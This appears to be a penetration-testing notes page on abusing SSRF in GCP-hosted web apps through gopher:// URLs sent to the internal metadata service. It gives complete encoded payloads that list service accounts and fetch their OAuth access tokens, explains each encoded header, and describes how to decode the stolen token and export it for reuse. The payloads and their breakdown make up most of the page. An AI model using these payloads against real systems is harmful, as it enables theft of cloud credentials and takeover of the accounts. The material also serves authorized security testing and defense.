SSRF using Gopher protocol

If we successfully detect a SSRF vulnerability in a web app and the web app is hosted on GCP, we may use specific protocols and URLs to request specific information, depending on the case.

URL Example:

gopher://metadata.google.internal:80/xGET%2520/computeMetadata/v1/instance/service-accounts/<snip>-compute@developer.gserviceaccount.com/token%2520HTTP%252f%2531%252e%2531%250AHost:%2520metadata.google.internal%250AAccept:%2520%252a%252f%252a%250aMetadata-Flavor:%2520Google%250d%250a

Breakdown

Protocol and Target: gopher://metadata.google.internal:80/

This part of the payload specifies that the Gopher protocol is being used to make a request to metadata.google.internal on port 80. As mentioned, metadata.google.internal is a special domain used internally by Google Cloud services to provide metadata information to VM instances.

Crafted Request: GET /computeMetadata/v1/instance/service-accounts/SERVICE_ACCOUNT/token

This is a GET request to the Google Cloud metadata service API, requesting an access token associated with a service account. We need to find out what service account is associated with the VM.

%2520HTTP%252f%2531%252e%2531

This is an encoded form of " HTTP/1.1"

%250AHost:%2520metadata.google.internal

This is an encoded header specifying the host.

%250AAccept:%2520%252a%252f%252a

Encoded header for the Accept field, indicating that any media type is acceptable in response.

%250aMetadata-Flavor:%2520Google

Importantly this sets the header that is required to access the metadata service.

SSRF Payloads

List Service Accounts

gopher://metadata.google.internal:80/xGET%2520/computeMetadata/v1/instance/service-accounts/%2520HTTP%252f%2531%252e%2531%250AHost:%2520metadata.google.internal%250AAccept:%2520%252a%252f%252a%250aMetadata-Flavor:%2520Google%250d%250a

Fetch Access Token of the listed Service Account

gopher://metadata.google.internal:80/xGET%2520/computeMetadata/v1/instance/service-accounts/bucketviewer@gr-proj-1.iam.gserviceaccount.com/token%2520HTTP%252f%2531%252e%2531%250AHost:%2520metadata.google.internal%250AAccept:%2520%252a%252f%252a%250aMetadata-Flavor:%2520Google%250d%250a

TIP: The response is HTML encoded so we can select the entire token, right-click it and select Convert selection > HTML > HTML-decode. After that, copy the token to your clipboard and then use it as an environmental variable.

Command:

export GOOGLE_ACCESS_TOKEN="ACCESS_TOKEN"

PreviousExploitation NextMisc

Last updated 7 months ago

hashtagSSRF using Gopher protocol

hashtagIf we successfully detect a SSRF vulnerability in a web app and the web app is hosted on GCP, we may use specific protocols and URLs to request specific information, depending on the case.

hashtagURL Example:

hashtagBreakdown

hashtagProtocol and Target: gopher://metadata.google.internal:80/

hashtagCrafted Request: GET /computeMetadata/v1/instance/service-accounts/SERVICE_ACCOUNT/token

hashtag%2520HTTP%252f%2531%252e%2531

hashtag%250AHost:%2520metadata.google.internal

hashtag%250AAccept:%2520%252a%252f%252a

hashtag%250aMetadata-Flavor:%2520Google

hashtagSSRF Payloads

hashtagList Service Accounts

hashtagFetch Access Token of the listed Service Account

hashtagTIP: The response is HTML encoded so we can select the entire token, right-click it and select Convert selection > HTML > HTML-decode. After that, copy the token to your clipboard and then use it as an environmental variable.

hashtagCommand: